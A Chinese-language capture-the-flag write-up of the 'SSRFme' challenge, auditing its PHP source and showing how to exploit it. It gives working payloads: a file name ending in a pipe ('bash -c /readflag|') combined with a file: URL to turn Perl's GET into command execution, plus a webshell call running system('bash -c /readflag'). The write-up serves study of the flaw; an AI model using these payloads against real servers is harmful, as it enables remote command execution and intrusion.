本文详细分析了一道关于SSRFme的编程挑战,涉及$_SERVER变量处理、X-Forwarded-For头的IP获取、文件系统操作和perl脚本执行。通过GET请求和特殊字符利用,作者展示了如何利用服务器的SSRF漏洞读取和执行文件。
HNCTF2017 SSRFME
今天深度剖析一下SSRFme这道题目
拿道题目从上往下的代码审计进行分析
第一部分:
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
$_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
}
echo $_SERVER["REMOTE_ADDR"];
功能:
1.$_SERVER的功能是接受一个参数,这里是在X-FORWARD里面
在首行代码中,explode(‘,’, $_SERVER[‘HTTP_X_FORWARDED_FOR’]) 使用逗号 (,) 作为分隔符将字符串分割成数组。因为这个头部允许包含多个 IP 地址,其中最左边的 IP 地址是最初的客户端 IP。
第二部分:
$sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
echo $sandbox;
@mkdir($sandbox);
@chdir($sandbox);
功能:
1.sandbox变量是由sandbox加上(orange+上文的地址赋值)
举例说明: 赋值127.0.0.1加密后为cfbb870b58817bf7705c0bd826e8dba7。
组合后就是
sandbox/cfbb870b58817bf7705c0bd826e8dba7
2.mkdir创建文件夹
3.chdir更改当前目录到文件夹
第三部分:
$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
功能:
1.$data = shell_exec("GET " . escapeshellarg($_GET["url"]));
这里有一个重点perl脚本GET的使用,可以直接查询目录,和正常指令一样
2.Pathinfo()函数作用
可以通过以下方式访问 `pathinfo()` 返回的关联数组中的不同信息:
$info['dirname']:返回文件所在目录的路径。$info['basename']:返回文件的完整基本名称(包含文件名和扩展名)。$info['extension']:返回文件的扩展名。$info['filename']:返回文件的名称(不包含扩展名)。 ```
3.str_replace的把点换成空格
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
highlight_file(__FILE__);
在当前目录就是sandbox/cfbb870b58817bf7705c0bd826e8dba7文件夹建立文件名不要拓展名
回到本题,
方法一:perl命令读取
我们可以尝试GET /读取根目录
?url= /&filename=666.txt
访问一下:
/sandbox/fcf2bccafc269c160382150a0166d632/666.txt
在当前目录就建立了以data数据内容的一个个目录
再看到
可以看到根目录,那怎么读取,先尝试
url=/flag&filename=6667.txt 读取是空白,再看readflag,是乱码二进制数据很明显就是要我们运行,那这里就要用到file配合。
主要的知识点:perl函数看到要打开的文件名中如果以管道符(键盘上那个竖杠|)结尾,就会中断原有打开文件操作,并且把这个文件名当作一个命令来执行,并且将命令的执行结果作为这个文件的内容写入。这个命令的执行权限是当前的登录者。如果你执行这个命令,你会看到perl程序运行的结果。
针对GET命令,使用file:来搭配读取文件
而想执行readflag文件,仅仅是使用file:是不够的,还需要使用Linux下的命令执行:bash -c 首先得满足前面的文件存在,
才会继续到open语句, 所以在执行命令前得保证有相应的同名文件:
?url=&filename=bash -c /readflag|
先新建一个名为“bash -c /readflag|”的文件,用于之后的命令执行
?url=file:bash -c /readflag|&filename=aaa
这就拿到fkag了
方法二:vps写入
get访问自己服务器上的文件写入木马即可之后用一句话木马,但执行要用
cmd=system('bash -c /readflag');
扫一扫
1882
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
